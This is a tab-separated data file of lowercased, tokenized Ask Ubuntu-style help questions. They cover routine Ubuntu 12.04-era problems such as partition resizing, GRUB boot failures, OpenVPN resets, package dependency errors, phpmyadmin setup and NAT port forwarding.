177395	gparted partition resize gone wrong - failed to read last sector	i have tried to resize ( shrink ) my ntfs partition so that i will be able to get more space for my ext4 ubuntu 's ( 12.04 64 bit ) partition but after the partition has been resized i am unable to mount it . i used gparted to do this . i assume there is a problem somewhere with the partition table but i do not know where and how to fix it . this is what i get in gparted information window on ntfs partition : gparted overview screenshot fdisk -l and mount /dev/sda5 /media/d root @ ubuntu : /home/xxx # mount /dev/sda5 /media/d failed to read last sector ( 718198764 ) : invalid argument hints : either the volume is a raid/ldm but it was n't setup yet , or it was not setup correctly ( e.g . by not using mdadm -- build ... ) , or a wrong device is tried to be mounted , or the partition table is corrupt ( partition is smaller than ntfs ) , or the ntfs boot sector is corrupt ( ntfs size is not valid ) . failed to mount '/dev/sda5 ' : invalid argument the device '/dev/sda5 ' does n't seem to have a valid ntfs . maybe the wrong device is used ? or the whole disk instead of a partition ( e.g . /dev/sda , not /dev/sda1 ) ? or the other way around ? root @ ubuntu : /home/xxx # fdisk -l disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x68beefda device boot start end blocks id system /dev/sda1 19 27262991 13631486+ 27 hidden ntfs winre /dev/sda2 * 27262992 27467791 102400 7 hpfs/ntfs/exfat /dev/sda3 27467792 232267775 102399992 7 hpfs/ntfs/exfat /dev/sda4 232267793 976771071 372251639+ f w95 ext 'd ( lba ) /dev/sda5 232267795 918867967 343300086+ 7 hpfs/ntfs/exfat /dev/sda6 968046592 976771071 4362240 82 linux swap / solaris /dev/sda7 950468608 968044543 8787968 83 linux partition table entries are not in disk order
177396	boot menu screwed up , computer wo n't boot	i 've been using ubuntu to for years now , i 'm an ee and love the system . this week i was having trouble with ubuntu so i decided to do a fresh install parallel with win xp . the install crashed midstream and now i can not boot at all . i believe all i need to do is repair the grub.cfg file , or maybe another file ? so , i booted from my livecd and went into the file structure and everything seems intact , however , the grub.cfg file looks like it 's a mess . i do n't remember how to gain access to grub via permissions . i did it once before a year ago . any one with any ideas ?
177398	unable to boot 12.04 due to segmentation fault	i am having 12.04 lts installation alongside windows 7 . when i boot ubuntu , it fails to boot into login screen instead it gives the following error : udevd [ 121 ] : 'sbin/blkid -o udev -p /dev/sda2 ' [ 284 ] terminated by signal 11 ( segmentation fault ) busybox v1.18.5 ( ubuntu 1:1.18.5-1ubuntu4 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands ( initramfs ) can any one help me out on what to do next ? i would like to point out that my ubuntu was working fine and this error started popping up suddenly , although the segmentation fault in /dev/sda2 error was coming from a long time due to that i just could not mount that drive . by the way /dev/sda2 contains c : drive of windows .
177403	quantal quetzal 12.10 : where do i ask ?	forgive my asking if this is not a good question . i am now running 12.10 alpha 3 and was wondering where it is i should go for help regarding bugs and issues related to my experiences . i know that ask ubuntu may not be the place as it is not yet officially released , but am hoping someone could point me in the right direction .
177412	how to force ubuntu 10.04 / 12.04 to install and boot in low graphics mode ?	unlike others who are trying to get out of low graphics mode , i want to force ubuntu into low graphics mode . the reason is , i have a machine which has enough performance to use , but the graphics card is broken and i do n't want to spend the money on a new graphics card . it would be enough for me to run the whole thing in low graphics mode . is there an possibility to install ubuntu in a such a way that it always boots in low graphics mode ? are there any flags / options ? ( i 'm referring to either 10.04 or 12.04 ) thanks in advance
177418	chrome tab navigation issues . also drag and drop only works intermittently	i recently upgraded to 12.04 and am running gnome-shell . i use both ff and chrome , but rely on chrome for use with google apps . in the last couple of months with recurring frequency i lose my ability to navigate open tabs especially when the browser if full screen . if i open a new tab , i 'm often able to recover my ability to navigate , or if i resize the browser so that it 's not full screen , i can navigate again too . i 'd experimented with using chromium , and eventually experience the same behavior . this may not be related , but i also often lose my ability to drag and drop files/images into gmail . thinking that this might be extension related , i have disabled all extensions , and experience the same behavior . very frustrating , as mostly love chrome .
177419	why the connection is getting closed ?	i have installed open vpn . both in my servers and in my computer . i see my log files as : aug 18 18:37:52 ubuntu openvpn [ 27920 ] : local options hash ( ver=v4 ) : 'bd6dea9e' aug 18 18:37:52 ubuntu openvpn [ 27920 ] : expected remote options hash ( ver=v4 ) : '760316bb' aug 18 18:37:52 ubuntu openvpn [ 27931 ] : attempting to establish tcp connection with x.x.x.x.x.x:80 aug 18 18:37:52 ubuntu openvpn [ 27931 ] : tcp connection established with x.x.x.x:80 aug 18 18:37:52 ubuntu openvpn [ 27931 ] : socket buffers : r= [ 87380- > 131072 ] s= [ 23860- > 131072 ] aug 18 18:37:52 ubuntu openvpn [ 27931 ] : tcpv4_client link local : [ undef ] aug 18 18:37:52 ubuntu openvpn [ 27931 ] : tcpv4_client link remote : x.x.x.x.x:80 aug 18 18:37:52 ubuntu openvpn [ 27931 ] : warning : bad encapsulated packet length from peer ( 15393 ) , which must be > 0 and < = 1546 -- please ensure that -- tun-mtu or -- link-mtu is equal on both peers -- this condition could also indicate a possible active attack on the tcp link -- [ attemping restart ... ] aug 18 18:37:52 ubuntu openvpn [ 27931 ] : connection reset , restarting [ 0 ] aug 18 18:37:52 ubuntu openvpn [ 27931 ] : tcp/udp : closing socket aug 18 18:37:52 ubuntu openvpn [ 27931 ] : /sbin/route del -net x.x.x.x.x . netmask 255.255.255.255 aug 18 18:37:52 ubuntu openvpn [ 27931 ] : /sbin/route del -net 0.0.0.0 netmask 128.0.0.0 aug 18 18:37:52 ubuntu openvpn [ 27931 ] : /sbin/route del -net 128.0.0.0 netmask 128.0.0.0 aug 18 18:37:52 ubuntu openvpn [ 27931 ] : closing tun/tap interface aug 18 18:37:52 ubuntu openvpn [ 27931 ] : sigusr1 [ soft , connection-reset ] received , process restarting aug 18 18:37:52 ubuntu openvpn [ 27931 ] : restart pause , 5 second ( s ) aug 18 18:37:57 ubuntu openvpn [ 27931 ] : can not open file key file 'ovpn.key ' : no such file or directory ( errno=2 ) aug 18 18:37:57 ubuntu openvpn [ 27931 ] : exiting i wonder where is the problem , which makes vpn to reconnect . note that the file ovpn.key is in the current directory ! . but still its showing can not open file error message . can anybody say me where i 'm making mistake ? thanks in advance .
177422	which ubuntu to use for my old laptop ?	i am totally new to linux . i downloaded ubuntu 12.04 and installed it on my old laptop with 512mb ram , 1.66 ghz processor on a partition of size 10gb ( with windows xp on another partition . ) now when i boot to linux it shows lubuntu at the start screen ( which i found out is a lighter version or something , may be because of low specs ) . now when i run ubuntu and try to browse 5-6 tabs on firefox it starts getting sluggish . do i need to switch to an older version of ubuntu or is there any other fix to this ? ? thanks in advance ! !
177435	i can not install synaptic package manager because of the following error	how do i go around this and install it ? $ sudo apt-get install synaptic reading package lists ... done building dependency tree reading state information ... done package synaptic is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'synaptic ' has no installation candidate
177438	how to make a drive ntfs from ext4 ?	i want to know how to make a drive ( non-system ) from ext4 to ntfs . can anyone help me out ?
177439	lubuntu , panel items are not arranged in proper way	my lubuntu panel contains some running applets , but they are not arranged in order , and there is empty space between them . this particularly annoys me when using minimized windows . take a look at the image ; that will explain what i 'm trying to say edit : ok friends , i have deleted that panel , i dont have it right now . i am tired about that . but now one more problem i am facing i cant see the minimized windows on upper panel , of course i have created a upper panel and customized as i need but my minimzed windows are not displaying there . tell me how can i get that .
177441	how to login to my ubuntu desktop like in windows ?	today i tested something in 12.04 . i have automatic login enabled with password . so when i login a window pops up asking for the password . but i tested the following . i clicked cancel twice in the pop up window so the window disappears for a while then i opened my mozilla firefox browser i went straight to edit > preferences > saved passwords . i clicked show passwords and voilรก i had access all my account passwords without logging into ubuntu . is this a bug or what ? is there a solution to make ubuntu like in windows when a login screen comes up , i type my password than i access my desktop . it looks like that in ubuntu the desktop and my files are n't blocked . is there a solution to block everything while i type the password .
177447	how to recover or create deleted 'documents ' folder in home folder ?	i accidentally deleted 'documents ' folder and all its contents in home folder , is there any step by step way to recover or at least recreate an empty original 'documents ' folder again ? i 'm using ubuntu 12.04 by the way .
177448	login screen resolution causes monitor to be `` out of range ''	today i upgraded from 11.10 to 12.04 lts and i am experiencing some resolution problems . i fixed my desktop , but my welcome screen is `` out of range '' and then i press ctrl-alt- ( - ) ( from the numlock keypad ) to make it bearable to see where do i have to type my password . after this my desktop run in the preferred resolution ( 1440x900 ) . what do i have to do to fix my welcome screen resolution ? i tried this but it did n't work : wrong login screen resolution
177467	ubuntu 12.04 , can hear the sound but sound option in settings shows no sound card	i have weired issue . i did a fresh installation of ubuntu 12.04 . then i installed nvidia drives for my graphics card . i executed the command `` modprobe nvidia '' after installing the nvidia drivers and rebooted . after reboot , sound indicator in top panel is disabled and i ca n't control the volume from there . i opened settings > sound and it does not show any sound card installed . however , i can hear the sound . please help . output of lspci | grep audio 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 01 ) 01:00.1 audio device : nvidia corporation gf110 high definition audio controller ( rev a1 ) output of lsmod | grep snd snd_hda_codec_hdmi 32191 4 snd_hda_codec_realtek 73851 1 snd_hda_intel 33367 0 snd_hda_codec 134156 3 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel snd_hwdep 13668 1 snd_hda_codec snd_pcm 97188 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec snd_timer 29990 1 snd_pcm snd 78855 7 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_timer soundcore 15091 1 snd snd_page_alloc 18529 2 snd_hda_intel , snd_pcm
177468	unmet dependencies in ubuntu 12.04 ?	the following packages have unmet dependencies : gstreamer0.10-ffmpeg : depends : libavcodec-extra-53 ( > = 4:0.7-1 ) but 4:0.7.2.1ubuntu2 is to be installed depends : libavformat-extra-53 ( > = 4:0.7-1 ) but 4:0.7.2.1ubuntu2 is to be installed depends : libavutil-extra-51 ( > = 4:0.7-1 ) but 4:0.7.2.1ubuntu2 is to be installed depends : libc6 ( > = 2.7 ) but 2.15-0ubuntu10 is to be installed depends : libglib2.0-0 ( > = 2.24.0 ) but 2.32.3-0ubuntu1 is to be installed depends : libgstreamer-plugins-base0.10-0 ( > = 0.10.31 ) but 0.10.36-1ubuntu0.1 is to be installed depends : libgstreamer0.10-0 ( > = 0.10.31 ) but 0.10.36-1ubuntu1 is to be installed depends : liborc-0.4-0 ( > = 1:0.4.14 ) but 1:0.4.16-1ubuntu2 is to be installed depends : libpostproc-extra-52 ( > = 4:0.7-1 ) but 4:0.7.2.1ubuntu2 is to be installed depends : libswscale-extra-2 ( > = 4:0.7-1 ) but 4:0.7.2.1ubuntu2 is to be installed gstreamer0.10-ffmpeg : i386 : depends : libavcodec-extra-53 ( > = 4:0.7-1 ) but 4:0.7.2.1ubuntu2 is to be installed depends : libavformat-extra-53 ( > = 4:0.7-1 ) but 4:0.7.2.1ubuntu2 is to be installed depends : libavutil-extra-51 ( > = 4:0.7-1 ) but 4:0.7.2.1ubuntu2 is to be installed depends : libc6 ( > = 2.7 ) but 2.15-0ubuntu10 is to be installed depends : libglib2.0-0 ( > = 2.24.0 ) but 2.32.3-0ubuntu1 is to be installed depends : libgstreamer-plugins-base0.10-0 ( > = 0.10.31 ) but 0.10.36-1ubuntu0.1 is to be installed depends : libgstreamer0.10-0 ( > = 0.10.31 ) but 0.10.36-1ubuntu1 is to be installed depends : liborc-0.4-0 ( > = 1:0.4.14 ) but 1:0.4.16-1ubuntu2 is to be installed depends : libpostproc-extra-52 ( > = 4:0.7-1 ) but 4:0.7.2.1ubuntu2 is to be installed depends : libswscale-extra-2 ( > = 4:0.7-1 ) but 4:0.7.2.1ubuntu2 is to be installed package dependencies can not be resolved this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . i have tried to follow every instruction from here and it has still not helped me . what is the problem and how do i fix it ? edit : my problem is that i ca n't install gstreamer ffmpeg video plug-in codecs to play .mpeg , .divx , .mpeg4 , .ac3 , .wmv and .asf files
177469	problems installing 12.04 although bug has apparently been fixed	i was running 11.04 and i was actually having issues where my computer was n't booting so i decided it was time to do that upgrade i 'd been meaning to do for ages . i upgraded to 11.10 , this worked just fine . the install ran through to the end , and then everything booted up okay . then i upgraded straight away to 12.04 . or i tried to . my computer crashed part-way through , the screen froze and it would n't respond . so i killed the power and then restarted - and i got a blank screen with a mouse cursor sitting in the centre and nothing more . i tried rebooting a few more times , but i got the same thing each time . so i burned a 12.04 live cd , popped it in the cd drive and booted from that . that told me that i already have 12.04.1 lts installed , do i want to install 12.04 alongside or wipe the previous install and start from scratch ? i selected `` wipe everything and start from scratch '' . the installation got part-way through and then an error messaged popped up saying that it could n't continue . the bug report it tried to file said that the issue was already known and it directed me to this bug , which says it 's been fixed ! if it 's been fixed , then why am i still having a problem ? i did note that the cd was asking me all about 12.04 but told me i already had 12.04.1 installed . does that .1 make a difference ? i downloaded the 12.04 iso only yesterday . this is a desktop machine , a couple of years old now , but it 's hardly a dinosaur .
177472	disable dash home shortcut in 12.04	i 'm using ubuntu 12.04 in virtualbox on a macbook . the current shortcut for the dash home launcher is the command key ( super ) . i 'm trying to disable it . first , this option is not present in the shortcuts preferences . i have already tried : changing it through gconf-editor changing it through ccsm even though when i press super or super+f it still launches the dash home . any ideas on what i can still try ?
177473	how do i get my ipod to conect using libmobiledevice	so i have tried all the basic things to install including sudo add-apt-repository ppa : pmcenery/ppa all it does is report 'command not found ' . entering the command sudo gedit /etc/apt/sources.list.d/pmcenery.list pulls up a blank file . i do have wine installed but i am looking for an alternative if it 's not possible to use it under wine . using itunes under wine would be great too , however . it seems as if nothing will recognize my ipod , but when i type : lsusb | grep apple i get bus 005 device 015 : id 05ac:1293 apple computer , inc. are there any solutions for these problems ?
177479	how do i discover a ppa 's pgp key ?	i would like to be able to see the openpgp key of a ppa . i do not wish to add it to my sysetm . i only need to know what the key is . how might i discover this ?
177483	touchpad works on a dell inspiron m5030 but external mouse moves slow	i have 12.04 32-bit installed in my m5030 dell inspiron . it has a amd turionâ˘ ii processor , an ati mobility radeonâ˘ hd4250 , and 3gb in ram . i also had 11.10 and had the same problem . the touchpad is fine , but the usb mouse does n't work normally , it is very slow when moving . i tried changing it 's velocity and installed new updates but nothing , still i ca n't get the mouse to work properly . i really hope to solve this problem .
177486	unable to create/connect ad-hoc network in 12.04 with rtl8111/8168b pci express gigabit ethernet controller	i have 12.04 installed on my samsung laptop with rtl8111/8168b pci express gigabit ethernet controller . but i ca n't connect to or create a ad-hoc network . whether i need to install any additional drivers for enabling ad-hoc network ?
177489	how to set keyboard-shortcut to meta in kubuntu ?	i would like to set a shortcut for the run-command in kubuntu 12.04 , where the shortcut key would be the win key ( aka meta ) . the global keyboard shortcut settings however does not allow me to use the meta key alone , but rather in combination with some other key . as a keyboard-power-user , i find this frustrating : i want to open-search as fast as possible and the win key is a perfect candidate , which i used to use with gnome or xfce . is there a possibility to override this rule preventing me from using the meta key alone as a shortcut key ?
177494	after uninstalling wine some of the free space is 'locked ' ?	i have installed wine just to play with it ( and installed a game that had approx 7-8 gb ) and now i have uninstalled wine and removed it configs and i am left with these 7-8 gb less free space than i had before . i have no idea where this place evaporated since i had like ~~ 8 gb occupied ( 16 gb free ) before the isntallation this will maybe show you what i mean :
177496	need to switch back to windows 7. and remove this error to resolve grub : panic occured , switching back to text console	i am having acer aspire 4755 . i initially had windows7 . but tried ubuntu 12.04 . it was working fine . but when i tried to install windows 7 , i got this grub error . i am sure , i must have screwed up the grub file . so when i tried to run a live usb , dvd of ubuntu back again to install ubuntu , i got this error : panic occurred , switching back to text console . i even ca n't install windows 7 with its starter cd . kindly help me to remove ubuntu or remove grub and get my windows 7 working . i know i have to get the grub working , but how. ? ?
177519	usb flash drive mount issue	i have a 4gb usb flash drive , which used to work fine . recently , though , my mother had a problem with her hp winxp laptop . she tried to re-install xp using a dell recovery disk , which would not recognize her laptop 's hdd and tried to install onto my usb drive , which was plugged in at the time . she has a new laptop now , but my drive does n't work : ubuntu will not recognize it , and windows only recognizes it but ca n't mount or partition it . what should i do ?
177523	uninstalling unwanted applications	in windows , i can see all the programs installed in control panel - > programs and then can uninstall unwanted programs . but in ubuntu 11.04 , how can i see such list of installed programs and then uninstall them ?
177525	keyboard layouts plugin forgets settings , unable find workaround	i use xubuntu . as everyone knows , keyboard layouts plugin is very , very buggy and it still forgets my settings . it drives me crazy - i have to set them again and again every time i wake up or turn on my laptop . so i found a solution - put into my .bashrc this : setxkbmap -option '' -option grp : alt_shift_toggle cz , us -variant querty that should set my toggle to alt+shift and my layouts to czech querty and plain us english as a second one . voilă , that seems to work ! i could use keyboard layouts plugin only as an indicator , that 's okay . however , it does n't work well . the problem is that it ignores -variant setting . more or less . in keyboard layouts plugin i actually see czech querty selected , but in reality my keyboard types quertz . that 's insane : - ( could anyone help , please ?
177535	recordmydesktop file location	i have recorded a video with recordmydesktop , but forgot to specify filename with save as dialog . documetnation at http : //recordmydesktop.sourceforge.net/manpage.php tells that : recordmydesktop produces a file ( default out.ogv ) that contains a video and audio recording of a linux desktop session . its not in last used folder /home/username/videos does any1 know where default file out.ogv is saved if you do not specify a name in save as dialog recordmydesktop ?
177537	how do i install ubuntu on /dev/sda and not /dev/sdb ?	i am trying to dual boot ubuntu 12.04 with windows 7 . the installer will only let me try to install on /dev/sdb which is my 32gb caching ssd . i have partitioned space for ubuntu with gparted . does anyone know what i am doing wrong ? thank you .
177538	can not get ubuntu 12.04 to update	i have been using ubuntu for about 6 months now without any problems until i ran the update manager yesterday and kept getting this message : failed to download repository information check your internet connection then in the more details box it reported : w : failed to fetch cdrom : //ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) /dists/precise/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) /dists/precise/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms e : some index files failed to download . they have been ignored , or old ones used instead . i have tried using the terminal commands given but have had no luck .
177539	why does kde `` forget '' my multi-monitor settings ?	i 've installed kubuntu 12.04 ( latest patches always applied as they become available ) and experience an odd thing . whenever i customize the multi-monitor settings ( i.e . tell it to extend the desktop and which monitor to treat as primary ) these settings work for the session , but disappear once i reboot . can this have to do with the fact that i encrypt my home directory and such settings are stored in there ? again , i can apply the settings in the active session , but once i reboot they 're `` forgotten '' .
177540	help mounting a virtualbox folder between ubuntu and xubuntu	i am running ubuntu 12.04 natively and xubuntu under a virtualbox . in my xubuntu i can see inside of /media the following folder which does give me access to the host 's directory ( but only using root ) : drwxrwx -- - 1 root vboxsf 4096 2012-08-18 20:22 sf_sharedarea what command would automount this folder under my home user every time i login ?
177541	nixnote not working	i 've installed nixnote ( desktop client of evernote for linux ) in my ubuntu 12.04 . but while starting , it throws exception . here is complete detail of the exception .
177543	partitioning for ubuntu 32 and 64 on one drive	i need to have portable drive with 32 and 64 bit ubuntu . which partitions should be created ?
177549	phpmyadmin problem	somehow , i manages to install appache2 , php5 , mysql server and phpmyadmin . typically , i should type `` localhost/phpmyadmin '' in my browser to open the phpmyadmin interface .. however , this is what appears to me : not found the requested url /phpmyadmin was not found on this server . apache/2.2.22 ( ubuntu ) server at 10.0.0.254 port 80 i thought it maybe happening because i did n't restart the apache2 server .. so i wrote this line of code : root @ aadel-pc : /home/osama # /etc/init.d/apache2 restart and this was the result * restarting web server apache2 apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 for servername ... waiting apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 for servername so , guys please i need your help in this .
177552	remove unity icon when 'unlock from launcher ' does not appear	i recently installed the libreoffice 3.5.4.2 meta package via the ubuntu software center . this does not contain libreoffice base , so i installed it separately via the ubuntu software center as well . doing so created two icons on my unity dock : one for the main program and one for base . i can not remove the icon for base . whenever i right click on the icon , it gives me three options : new database ( this is normal and works as expected ) , a blank space that does nothing when clicked , and lock to launcher which does nothing when clicked . how can i remove this icon for base from the launcher ? i am running ubuntu 12.04 . i tried to add a picture of exactly what i see , but i 'm considered a new user . the system would n't let me , and i 'm not sure if i 'm allowed to upload it somewhere else and link to it .
177555	managing kindle fire with on 12.04 via micro-usb	to begin , i have read both is there a way to get a kindle fire to work with 12.04 ? and how can i transfer files to a kindle fire with a micro-usb cable ? my problem is that i am unable to mount my kindle fire in order to add books to it . i have installed calibre , but it is unable to manage any devices until the computer itself has recognized it . the latter post had an excellent answer ( provided by @ jeremiah ) that was making some progress . unfortunately , i think i do n't know enough about the -t flag used with mount . this is what i 've done ... ran dmesg to locate the device : [ 3.920886 ] sd 6:0:0:0 : [ sdb ] attached scsi removable disk confirmed it 's location : $ sudo ls -l /dev/disk/by-id lrwxrwxrwx 1 root root 9 aug 18 15:52 usb-amazon_kindle_3c6c002600000001-0:0 - > ../../sdb so we know that my kindle is recognized on /dev/sdb . i then used the mount command suggested by @ jeremiah : $ sudo mount -t ext3 /dev/sdb/ /mnt/kindle/ mount : no medium found on /dev/sdb the same error occurs for sudo mount /dev/sdb /mnt/kindle . note : i have created the 'kindle ' directory in 'mnt' any suggestions ?
177561	iso size versus disk size	hi guys i have a curiosity . some days ago i installed an ubuntu on a flash disk . then i took an image of its ext4 and swap area via dd . however , after a while i decided that i should move this ubuntu to a hard disk instead of the flash disk . i restored my ubuntu on a hard disk via dd by using the image of the ubuntu on the flash disk . the thing is that the flash disk has a capasity of 8gb and there were only 1gb free space and the hard disk has 150gb . however , when i run the ubuntu on that hard disk , it says that there are only 1gb unused and the 99 percentage of the hard disk is used . why ubuntu ignores the rest of the hard disk 's space . actually , it does not because it says 149gb is used , which means it is aware of the my disk space but in someway it sees the space is used .
177563	how to install ati radeon 5650 hd graphic card	i want to install a gnu/linux system on my laptop hp dv7-4120ew , because i 've heard that 3d applications like maya , realflow or houdini works here a lot better . unfortunately , i ca n't install my ati radeon 5650hd graphic card . i followed the instructions of this video . after reboot the system i get the next error : the system is running in low graphic mode . also running fglrxinfo in terminal gives me this errors : x error of failed request : badrequest ( invalid request code or no such operation ) major opcode of failed request : 135 ( glx ) minor opcode of failed request : 19 ( x_glxqueryserverstring ) serial number of failed request : 12 current serial number in output stream : 12 do you know how to fix this problem ? any solution allowing me to run 3d software will be good for me . i have ubuntu 12.04 , 64 bit version .
177564	font looks bad in browsers ( firefox and chrome )	font looks bad in browsers ( firefox and chrome ) all other applications as libreoffice look good . i 'm using ubuntu 12.04
177565	enabling middle click for pointer stick buttons	i 'm running a freshly-installed ubuntu 12.04 on my dell latitude d630 laptop . i generally use the pointer stick/eraser head to move the pointer around the screen , and the corresponding buttons to click ( i.e. , i do n't use the touchpad or its buttons ) . i 'm trying to use synclient to enable a virtual middle button click for the pointer stick-associated buttons , but have only seen how to do it for the touchpad-associated buttons . does anyone know how to do this ? it seems like synclient only has control over the touchpad buttons ( i only see tapbuttonn for n=1,2,3 ) ..
177566	what is the use of *-doc packages ?	i was installing some programs , and every program has a xxx-doc package . i suppose it 's for documentation , maybe even for man pages ? because i get a documentation online , thus in that case may i remove all -doc packages ? i only need basic man pages , not the whole documentation , so what they really should consist of ? e.g : vim-doc consist only from .html files ( checked using dpkg ) , so man page is n't there i think , so what 's the use of doc package ? is it safe to : sudo apt-get purge ( or remove ) . *-doc ?
177571	can i recreate a destroyed /boot without reinstalling ?	i was experimenting with an idea and /boot was put on the first 256mb of a 1gb flash drive . windows destroyed the whole scheme when trying to add an ntfs partition after it in the unallocated space . can i make a new /boot without having to reinstall ? the rest of the partitions are untouched and in perfect working order . please note that it 's not the master boot record that was destroyed , but the entire /boot partition . so this problem can not be solved just by reinstalling the grub2 boot loader .
177583	unsupported culture in .net application under wine	i 'm running ubuntu 12.04 lts . dotnet20 has been installed using winetricks . when i attempt to run a .net application , the application throws a system.argumentexception , stating the error message : system.argumentexception : culture name 'ga-ie ' is not supported . the application has no reason to load ga-ie as far as i know ; ubuntu is running in american english locale , but i 'm not sure how to check this as i am a beginner .
177585	how to make some partitions undetectable by ubuntu 12.04 ?	background my friend has got windows 7 and ubuntu installed in his laptop 's internal drive and ubuntu on external drive . recently , there is some problem with his internal hdd and it seems to me like there 's some problem with the sectors in some of his internal drive 's partitions . there 's an ntfs logical partition in the internal drive where lots of data is stored . he decided to use external drive as the main drive for a while , but needs the data on internal drive . problem whenever the internal drive 's failed partitions ( ubuntu and windows 7 installation drives ) are accessed , the system hangs/crashes . even while running update for ubuntu on external drive , the system hangs when update-grub runs at the end . so , obviously he is still running pretty much a live disk . deleting those partitions is not possible , because when you open a disk manager ( say gparted ) that scans the internal drive system hangs/crashes . question how to make some partitions invisible to ubuntu ? how to delete partitions without needing to scan the drive they are present on ? there was already a question that asked how to make partitions invisible to ubuntu , but that was about ntfs partition . here we have both ntfs and ext4 to exclude . long question short : how to exclude partitions ( say /dev/sda3 ) from being accessed for whatever reason ( but not delete them ) ? however , if deleting them is the only way to do it , please tell it - i am not sure about this .
177587	set so that libreoffice impress will go straight into show slide mode	when i start my libre office presentation , i would like it to go automatically into slide show mode . how can i do so ? [ with microsoft office you can do this by renaming a presentation to .pps ( from .ppt ) or .ppsx ( from .pptx ) ]
177589	services in rc.d , not starting automatically at boot	i have a few services in rc.d that are n't starting at boot time . i 've done the update-rc.d , redoing it tells me that start/stop links are already in place , and i can start services manually by using service start . one of these services ( sabnzbdplus ) was pulled from apt , the others are downloaded from git . none of them start up automatically . nothing seems to be on google other than reinstall the whole system . any advice ?
177591	wifi is not working on atheros ar9285 on 9.04	just now i have installed 9.04 in my lenovo z570 . i am new to ubuntu . by searching on various community , i come to know that i need to install wifi drivers to make wifi run because the output of lshw -c network shows that wireless drivers are unclaimed and output of iwconfig shows no wireless extensions . my laptop specifications are as below . wireless adapter : atheros ar9285 linux kernel version of os : ubuntu 9.04 please guide me from where to download this drivers and how to install it .
177593	updating wallpaper with smooth transitions	i 'd like to write a program which displays dynamically-generated slideshows on the desktop , replacing the wallpaper . the point is to display live photo-streams from the web , updating the wallpaper automatically as new images are posted . i 'm currently looking for the best way to display the images . the simplest thing is to just update the wallpaper by issuing a command to gsettings , for example : gsettings set org.gnome.desktop.background picture-uri file : ///new_wallpaper.png but this approach is n't perfect : 1 ) ( minor ) there 's a perceptible lag between issuing the command and the update . 2 ) ( major ) there 's no smooth transition from the old wallpaper to the new wallpaper , so the effect is jarring . do i have a better option ? a simple fade transition would be sufficient for my needs . in the future , though , i 'll want an interactive canvas , so the user can click on an interesting photo and have the relevant link opened in a browser .
177594	ubuntu 12.04 stopped to lock screen after x minutes	my ubuntu 12.04 suddenly stopped to auto-lock after x minutes . it does n't matter how long i leave the computer idle , it never turns the screen off and never locks the screen either . i am using gnome-shell . under the brightness and lock menu , i have marked : dim screen to save power turn screen off when idle for 5 minutes lock screen after 5 minutes i have already re-installed gnome-screensaver ( no effect ) . any ideas ?
177595	linux firewall nat port forwarding issues	at my home i have a linux server ( it 's only job is nat , dhcp , and dns ) with ubuntu 10.10 server 64-bit . i have webmin installed on the server too , but i do know my way around a command line quite well , so i can do anything suggested . i have a game server in my nat , which hosts on port 28000 udp , and it 's ip address is 10.40.2.25 ( internal ) . i setup the port forwarding under webmin as i do not understand how to use iptables via command line . when someone attempts to connect to the game server via the internet , they can not connect . i took a look at wireshark on the external computer and i see icmp packets that it needs to connect to the game server ( 10.40.2.25 ) . the entry says `` destination unreachable ( port unreachable ) '' i took a look at the packet and noticed it says : user datagram protocol , src port : nxlmd ( 28000 ) , dst port : 45282 ( 45282 ) the destination port occasionally changes after a different person connects , so i can not just forward the port . bottom line , is there any way i can have it so packets that should go to my internal game server ( 10.40.2.25 ) , do go to my internal game server ? thank you very much in advance ! any ideas ? really need to get this working .
177596	installed ubuntu using wubi due to lack of cd drive	i have installed 12.04 via wubi because my computer does not have a cd drive . is there any way that i can delete windows 7 from my computer and use the whole hd for ubuntu ? i ask this question because for one reason or another i can not boot from a boot-able usb stick ( either in windows or ubuntu , however the usb port works because i am able to use my cell phone 's tethering plan using all the usb ports to connect to the internet ) . edit : just found out the problem . eee pc model 1018p 's do not boot from any format other than fat and fat16 and not fat32 .
177600	right way to colorize ls ?	sometimes ago , i used ubuntu and had colorized ls , grep `` out of the box '' . now i install kubuntu and ls is plain text by default . i tried to discover something about it and notice that there is /etc/skel/.bashrc , which provide aliases to colorize ls , grep and something else , but seems it 's not executed now . what should i do to make it work ?
177602	terminal commands to add new custom browser to preferred applications ?	i would like to know the terminal commands to add new custom browser to preferred applications ? i do n't mean selecting a browser using : sudo update-alternatives 窶田onfig x-www-browser i would appreciate it if someone could help me with the following : what are the terminal commands to add a new custom browser to preferred applications ? i would like links in other files to work as well , for example , when i click on a link in a .pdf , i am currently getting the following error : failed to execute child process `` /opt/iron-linux-32/iron '' ( no such file or directory ) i also tried : $ /usr/share/iron/iron failed to execute child process `` /usr/share/iron/iron '' ( permission denied ) it also failed when i elevated permission . i have tried : sudo gnome-default-applications-properties then , in the `` command '' box entered : /opt/iron-linux-32/iron % s ( with and without the % s ) i have also tried : /usr/share/iron/iron % s i am using ubuntu 10.04 . i want to use srware iron . note : there might be an issue as well with privileges . i am using this as an opportunity to learn how to use the command line , and am really stuck . seems like it should be possible , but i might be getting stuck on syntax .
